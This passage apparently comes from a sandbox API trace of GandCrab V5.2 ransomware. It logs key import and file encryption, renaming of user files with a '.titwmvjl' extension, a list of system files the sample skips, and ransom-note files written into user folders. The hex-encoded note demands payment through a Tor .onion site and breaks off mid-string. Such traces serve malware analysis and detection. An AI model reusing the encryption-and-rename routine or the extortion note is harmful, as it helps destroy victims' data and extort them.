0x77570df0 [0079.748] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0079.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.749] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.749] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.749] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.752] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5033f8) returned 1 [0079.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.752] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.753] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.753] GetLastError () returned 0x0 [0079.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.753] CryptDestroyKey (hKey=0x5033f8) returned 1 [0079.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.753] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.753] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.756] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503938) returned 1 [0079.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.757] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.757] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.757] GetLastError () returned 0x0 [0079.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.757] CryptDestroyKey (hKey=0x503938) returned 1 [0079.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.757] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.757] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.758] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.758] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x1e, lpOverlapped=0x0) returned 1 [0079.770] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffffe2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.770] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x1e, lpOverlapped=0x0) returned 1 [0079.772] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.772] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0079.774] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.777] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.777] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.778] CloseHandle (hObject=0x2c4) returned 1 [0079.779] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\uproof\\custom.dic.titwmvjl"), dwFlags=0x1) returned 1 [0079.780] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.781] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.781] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.781] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.781] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a09d2ca4deb61a.lock" [0079.781] lstrlenW (lpString=".titwmvjl") returned 9 [0079.781] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a09d2ca4deb61a.lock") returned 79 [0079.781] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.781] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 88 [0079.781] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a09d2ca4deb61a.lock") returned 79 [0079.781] lstrlenW (lpString=".lock") returned 5 [0079.781] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.781] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.781] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.781] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.782] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.782] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.782] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.782] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\TITWMVJL-DECRYPT.txt" [0079.782] lstrlenW (lpString=".titwmvjl") returned 9 [0079.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\TITWMVJL-DECRYPT.txt") returned 75 [0079.782] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.782] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 84 [0079.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\TITWMVJL-DECRYPT.txt") returned 75 [0079.782] lstrlenW (lpString=".txt") returned 4 [0079.782] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.782] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.782] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.782] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\TITWMVJL-DECRYPT.txt") returned 75 [0079.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\TITWMVJL-DECRYPT.txt") returned 75 [0079.782] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.783] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.783] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.783] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.783] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.783] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.783] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.783] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.783] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.783] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0079.783] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0079.784] CloseHandle (hObject=0x2bc) returned 1 [0079.784] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0079.784] lstrcmpW (lpString1="Vault", lpString2=".") returned 1 [0079.784] lstrcmpW (lpString1="Vault", lpString2="..") returned 1 [0079.784] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Vault" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault" [0079.784] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\" [0079.784] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.784] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.785] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.785] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.785] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.785] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.785] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.785] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\\\TITWMVJL-DECRYPT.txt") returned 75 [0079.785] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\vault\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0079.786] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\